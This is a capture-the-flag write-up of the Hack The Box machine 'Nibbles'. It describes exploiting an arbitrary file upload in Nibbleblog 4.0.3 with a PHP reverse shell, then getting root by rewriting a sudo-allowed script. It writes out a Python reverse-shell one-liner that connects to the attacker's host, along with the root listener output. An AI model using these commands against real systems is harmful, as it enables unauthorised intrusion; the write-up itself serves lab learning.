HTB: Nibbles
Nibbles
After Bashed is Traceback but I’ve done that before; next is Nibbles.
Ports
SSH and HTTP only.
HTTP
The frontpage just says Hello world! but in the page source there is a comment about /nibbleblog, so we go there. It’s running a CMS called nibbleblog; searchsploit says there are two exploits; SQLi in version 3 and an arbitrary file upload in version 4.0.3. It’s not immediately clear which we have.
Some enumeration reveals http://10.10.10.75/nibbleblog/README:
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01
So we’re after the arbitrary file upload; but it needs authentication. I try bruteforcing the login, but it has a protection mechanism whereby you are locked out after only a few attempts. I google for how to defeat it, but all of the results are Nibbles writeups!
This blog talks about how to get around the bruteforce prevention without spoiling the rest of the box, but it also gives up the password. I feel a bit conflicted about this, but I use it and log in.
I also fork the repo with the script (Python) for future reference.
Yeeting Metasploit?
The exploit from Searchsploit is a Metasploit module. Nah, let’s see if we can do it manually. It looks fairly straightfoward. We use the GUI to upload a file (the Pentestmonkey PHP reverse shell) at http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
This prints a bunch of warnings: e.g.
Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26
But even so it does work. We visit the shell (it gets renamed to image.php) at http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php and we get our shell
Privesc
We are nibbler. My shell is a bit dodgy and sudo -l won’t work. However it works via linpeas for some reason, and we can run /home/nibbler/personal/stuff/monitor.sh as root. Okey dokey. This file doesn’t actually exist, but there is a zipfile called personal which we can unzip and it creates the path and file. We own monitor.sh so we can make it whatever we want. I try a few payloads before I get one that works:
nibbler@Nibbles:/home/nibbler/personal/stuff$ rm monitor.sh
rm monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ printf '#!/usr/bin/python3\n' >> monitor.sh
<er/personal/stuff$ printf '#!/usr/bin/python3\n' >> monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ printf 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> monitor.sh
< os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh
chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ !33
!33
sudo -u root /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed outIn my listener:
┌──(root💀kali)-[/opt/htb/nibbles]
└─# nc -nvlp 1235 1 ⨯
listening on [any] 1235 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.75] 38506
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -lash
total 32K
4.0K drwx------ 4 root root 4.0K Dec 15 05:09 .
4.0K drwxr-xr-x 23 root root 4.0K Dec 15 05:13 ..
0 -rw------- 1 root root 0 Dec 29 2017 .bash_history
4.0K -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
4.0K drwx------ 2 root root 4.0K Dec 10 2017 .cache
4.0K drwxr-xr-x 2 root root 4.0K Dec 10 2017 .nano
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw------- 1 root root 1.1K Dec 15 05:09 .viminfo
4.0K -r-------- 1 root root 33 Mar 7 03:44 root.txtSo that was that but I can’t help feel I missed the most important part of this challenge. Anyway; next cab off the rank is Optimum. I’ll have a crack at that tomorrow.